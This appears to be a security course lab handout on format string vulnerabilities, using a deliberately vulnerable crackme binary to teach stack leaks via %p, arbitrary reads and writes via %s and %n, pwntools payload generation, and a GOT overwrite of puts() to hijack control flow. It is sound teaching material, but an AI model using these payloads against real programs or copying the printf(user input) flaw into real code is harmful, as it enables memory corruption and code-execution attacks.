==================================
Lec06: Fromat String Vulnerability
==================================

1. Revisiting an enhanced "crackme0x00"
=======================================

We've eliminated the buffer overflow vulnerability in the crackme0x00
binary. Let's check out the new implementation!

------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

unsigned int secret = 0xdeadbeef;

void handle_failure(char *buf) {
  char msg[100];
  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);
}

int main(int argc, char *argv[])
{
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  int tmp = secret;

  char buf[100];
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  fgets(buf, sizeof(buf), stdin);

  if (!strcmp(buf, "250382\n")) {
    printf("Password OK :)\n");
  } else {
    handle_failure(buf);
  }

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }

  return 0;
}
------------------------------------------------------------

  $ checksec --file crackme0x00-ssp-exec
  [*] 'tut/lab06/crackme0x00-ssp-exec'
      Arch:     i386-32-little
      RELRO:    Partial RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      No PIE (0x8048000)

As you can see, it is a fully protected binary.

NOTE. These two lines are to make your life easier; it immediately
      flushes your input and output buffers.

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

It works as before, but when we type an incorrect password, it
produces an error message like this:

  $ ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:asdf
  Invalid Password! asdf

Unfortunately, this program is using printf() in a very insecure way.

  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);

Please note that "msg" might contain your input (e.g., invalid
password). If it contains a special format specifier, like "%",
printf() interprets its format specifier, leading into a security
issue.

Let's try typing "%p":

  %p: pointer
  %s: string
  %d: int
  %x: hex

  $ ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:%p
  Invalid Password! 0x64

What's 0x64 as an integer? guess what does it represent in the code?

Let's go crazy by putting more "%p" x 15

  $ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p"  | ./crackme0x00-ssp-exec
  Password:Invalid Password! 1=0x64|2=0x80487b0|3=0xff84d918 ...

In fact, this output string is your stack for the printf call:

  1=0x64
  2=0x5659705c
  3=0xffdd9af8
  4=0xf7edf580
  ...
  10=0x61766e49
  11=0x2064696c
  12=0x73736150
  13=0x64726f77
  14=0x3d312021
  15=0x327c7025

Since it's so tedious to keep putting '%p', printf-like functions
provide a convenient way to point to the arguments:

  %[nth]$p
  (e.g., %1$p = first argument)

Let's try:

  $ echo "%10\$p" | ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:Invalid Password! 0x61766e49

NOTE. '\$' is to avoid the interpretation (e.g., $PATH) by the shell.

It matches with the 10th stack value listed above.


2. Format String Bug to an Arbitrary Read
=========================================

Let's exploit this format string bug to write an arbitrary value to an
arbitrary memory region.

Have you noticed some interesting values in the stack?

  4=0xf7edf580
  ...
  10=0x61766e49  'Inva'
  11=0x2064696c  'lid '
  12=0x73736150  'Pass'
  13=0x64726f77  'word'
  14=0x3d312021  '! 1='
  15=0x327c7025  '%p|2'
  

It seems we can now infer what we put it onto the stack as an
argument. What's going on?

When you invoke a printf() function, your arguments passed through the
stack are placed like these:

  printf("%s", a1, a2 ...)

  [ra]
  [  ] --+
  [a1]   |
  [a2]   |
  [%s] <-+
  [..]

In this simple case, you can point to the "%s" (as value) with
"%3$s"! It means you can 'read' (e.g., 4 bytes) an arbitrary memory
region like this:

  printf("\xaa\xaa\xaa\xaa%3$s", a1, a2 ...)

  [ra ]
  [   ] --+
  [a1 ]   |
  [a2 ]   |
  [ptr] <-+
  [.. ]

It reads (%s) 4 bytes at 0xaaaaaaaa and prints out its value. In case
of crackme0x00-ssp-exec, where is your controllable input located in
the stack (the _N_ value in the below)?

  $ echo "BBAAAA%N\$p" | ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:Invalid Password! BBAAAA0x41414141

What happen when we replace %p with %s? How does it crash?

> How could you read the 'secret' value?

Note that you can locate the address of secret by using 'nm':

  $ nm crackme0x00-ssp-exec | grep secret 
  0804c04c D secret


2. Format String Bug to an Arbitrary Write
==========================================

In fact, printf() is very complex, and it supports a 'write': it
writes the total number of bytes printed so far to the location you
specified.

  %n: write number of bytes printed (as an int)

  printf("aaaa%n", &len);

'len' contains 4 = strlen("aaaa") as a result.

Similar to the arbitrary read, you can also write to an arbitrary
memory location like this:

  printf("\xaa\xaa\xaa\xaa%3$n", a1, a2 ...)

  [ra ]
  [   ] --+
  [a1 ]   |
  [a2 ]   |
  [ptr] <-+
  [.. ]

*0xaaaaaaaa = 4 (i.e., \xaa x 4 are printed so far)

Then, how to write an arbitrary value? We need another useful
specifier of printf:

  %[len]d
  (e.g., %10d: print out 10 spacers)

To write 10 to 0xaaaaaaaa, you can print 6 more characters like this:

  printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2 ...)
                          ---
  *0xaaaaaaaa = 0x00000010

By using this, you can write an arbitrary value to the arbitrary
location. For example, you can write a value, 0xc0ffee, to the
location, 0xaaaaaaaa:

1. You can either write four bytes at a time like this:

  *0xaaaaaaaa = 0x000000ee
  *0xaaaaaaab = 0x000000ff
  *0xaaaaaaac = 0x000000c0

2. Or you can use these smaller size specifiers like below:

  %hn : write the number of printed bytes as a short
  %hhn: write the number of printed bytes as a byte

  printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2 ...)
                          ---
  *(unsigned char*)0xaaaaaaaa = 0x10

  so,

  *(unsigned char*)0xaaaaaaaa = 0xee
  *(unsigned char*)0xaaaaaaab = 0xff
  *(unsigned char*)0xaaaaaaac = 0xc0

> How could you overwrite the 'secret' value with 0xc0ffee?


3. Using pwntool
================

In fact, it's very tedious to calculate the fmtstr that overwrites an
arbitrary value to an arbitrary location once you understand the core
idea. pwntool provides such a fmtstr exploit generator for you.

  http://docs.pwntools.com/en/stable/fmtstr.html

  fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  - offset: the first formatter’s offset you control
  - writes: dict with addr, value {addr: value, addr2: value2}
  - numbwritten: the number of bytes already written by printf()

Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we have a
controlled the fmtstr at a 4th param (i.e., %4$p), but we already
printed out 10 characters.

  $ python2 -c "from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))"
  \xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa\xad\xaa\xaa\xaa%202c%15$hhn%17c%16$hhn%193c%17$hhn%64c%18$hhn

Is it similar to what you've came up with to write 0xc0ffee to the
'secret' value? Please modify template.py to overwrite the 'secret'
value!


4. Arbitrary Execution!
=======================

Your task today is to launch an control hijacking attack by using this
fmtstr vulnerability. The plan is simple: overwrite the GOT of puts()
with the address of print_key(), so when puts() is invoked, we can
redirect its execution to print_key().

Just in case, you haven't heard of GOT. Global Offset Table, shortly
GOT, is a table whose entry contains an external function pointer
(e.g., puts() or printf() in libc). When a dynamic loader (ld)
initially loads your program, the GOT table is filled with static code
pointers that ultimately invoke _dl_runtime_resolve(), and then, once
the location of the calling function is resolved, the entry is updated
with the resolved pointer (i.e., real puts() and printf() in
libc). Once resolved, the following calls will immediately direct its
execution to the real functions, as the resolved function pointer is
updated in the GOT entry.

For example, this is the code snippet for calling puts() in the main():

   0x080488b6 <main+211>:    sub    esp,0xc
   0x080488b9 <main+214>:    push   0x80489ff
   0x080488be <main+219>:    call   0x8048540 <puts@plt>

Note that puts@plt is not the true "puts()" in libc; 0x80490a0 is in
your code section (try, vmmap 0x80490a0) and the true puts() of libc
locates here:

   > x/10i puts
=> 0xf7630da0 <puts>:	push   ebp
   0xf7630da1 <puts+1>:	push   edi
   0xf7630da2 <puts+2>:	push   esi
   0xf7630da3 <puts+3>:	push   ebx

puts@plt means 'puts' at the Procedure Linkage Table (PLT); it points
to one of the entry in PLT:

> pdisas 0x8049080
 ► 0x8048520 <err@plt>                    jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+32] <0x804a020>
   0x8048526 <err@plt+6>                  push   0x28
   0x804852b <err@plt+11>                 jmp    0x80484c0

   0x8048530 <fread@plt>                  jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+36] <0x804a024>
   0x8048536 <fread@plt+6>                push   0x30
   0x804853b <fread@plt+11>               jmp    0x80484c0

   0x8048540 <puts@plt>                   jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+40] <0x804a028>
   0x8048546 <puts@plt+6>                 push   0x38
   0x804854b <puts@plt+11>                jmp    0x80484c0

   ...

Let's follow this call (i.e., single stepping into the call),

►  0x8048540 <puts@plt>                   jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+40] <0x804a028>
   0x8048546 <puts@plt+6>                 push   0x38
   0x804854b <puts@plt+11>                jmp    0x80484c0
    ↓
   0x804a028                              push   dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804c004>
   0x804a02c                              jmp    dword ptr [0x804c008] <0xf7fe9240>
    ↓
   0xf7fe9240 <_dl_runtime_resolve>       push   eax
   0xf7fe9241 <_dl_runtime_resolve+1>     push   ecx
   0xf7fe9242 <_dl_runtime_resolve+2>     push   edx

GOT of puts() (i.e., _GLOBAL_OFFSET_TABLE_+40) initially points to
puts@plt+6, the right next instruction to puts@plt, and ends up invoking
_dl_runtime_resolve() with two parameters, one of which simply
indicates that puts() should be resolved (i.e., 0x30). Once resolved,
_GLOBAL_OFFSET_TABLE_+40 (0x804c028) will point to the real puts() in
libc (0xf7e0a930).

So, can you overwrite the GOT entry of puts(), and try to hijack by
yourself?

In fact, there are two challenges that you will be encountering when
writing an exploit.

1) in order to reach puts(), you have to overwrite both the secret
   value and the GOT of puts():

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }

What should be the 'writes' param for fmtstr_payload()?


2) Unfortunately, the size of the buffer is very limited, so it
couldn't contain both write targets.

  void handle_failure(char *buf) {
    char msg[100];
    ...
  }

Do you remember the %hn or %hhn tricks that help you overwrite smaller
bytes, like one or two? That's where 'write_size' plays a role:

  fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  - write_size (str): must be byte, short or int. Tells if you want to
      write byte by byte, short by short or int by int (hhn, hn or n)

Finally! can you hijack the put() invocation to print_key() to get
your flag for this tutorial?